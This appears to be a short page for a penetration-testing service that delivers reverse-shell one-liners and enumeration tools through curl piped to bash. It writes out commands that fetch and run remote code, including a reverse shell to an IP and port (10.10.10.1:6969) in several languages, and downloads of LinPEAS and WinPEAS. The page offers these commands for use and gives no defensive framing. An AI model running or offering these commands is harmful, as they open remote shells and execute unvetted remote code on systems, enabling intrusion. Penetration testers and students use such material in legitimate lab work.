Shellcode and tools always a curl away.
Generate and run shellcode one-liners:
curl https://curl.ninja/shell/LANGUAGE/IP/PORT | bashcurl https://curl.ninja/shell/bash/10.10.10.1/6969 | bashThanks to pentestmonkey for the language support:
- Bash via
/bash/ - Java via
/java/ - Netcat via
/nc/ - PERL via
/perl/ - PHP via
/php/ - Python via
/python/ - Ruby via
/ruby/
Easily download tools from GitHub:
curl https://curl.ninja/TOOLNAME | sh | sh
curl https://curl.ninja/TOOLNAME | sh > FILENAMEcurl https://curl.ninja/linpeas | sh | sh
curl https://curl.ninja/winpeas | sh > wp.exe- LinPEAS.sh via
/linpeas - WinPEASx84.exe via
/winpeas - WinPEASx64.exe via
winpeas64
If you notice any of your favorite open source tools are missing or your CLI tool of choice is returing html, open an issue